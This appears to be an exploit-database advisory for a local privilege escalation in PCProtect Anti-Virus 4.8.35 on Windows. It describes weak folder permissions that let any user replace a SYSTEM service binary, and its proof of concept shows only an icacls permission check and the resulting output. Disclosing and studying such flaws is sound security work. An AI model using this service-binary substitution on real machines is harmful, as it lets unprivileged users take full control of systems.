Exploits / Vulnerability Discovered : 2018-09-28 |
Type : local |
Platform : windows_x86-64
This exploit / vulnerability Pcprotect 4.8.35 privilege escalation is for educational purposes only and if it is used you will do on your own risk!
# Description:
# PCProtect Anti-Virus v4.8.35 installs by default to "C:\Program Files (x86)\PCProtect" with very
# weak folder permissions granting any user full permission "Everyone: (F)" to the contents of the
# directory and it's subfolders. In addition, the program installs a service called "SecurityService"
# which runs as "Local system account", this will allow any user to escalate privileges
# to "NT AUTHORITY\SYSTEM" by substituting the service's binary with malicious one.
# PoC
C:\Users\IEUser>icacls "c:\Program Files (x86)\PCProtect"
c:\Program Files (x86)\PCProtect BUILTIN\Users:(OI)(CI)(F)
Everyone:(OI)(CI)(F)
NT SERVICE\TrustedInstaller:(I)(F)
NT SERVICE\TrustedInstaller:(I)(CI)(IO)(F)
NT AUTHORITY\SYSTEM:(I)(F)
NT AUTHORITY\SYSTEM:(I)(OI)(CI)(IO)(F)
BUILTIN\Administrators:(I)(F)
BUILTIN\Administrators:(I)(OI)(CI)(IO)(F)
BUILTIN\Users:(I)(RX)
BUILTIN\Users:(I)(OI)(CI)(IO)(GR,GE)
CREATOR OWNER:(I)(OI)(CI)(IO)(F)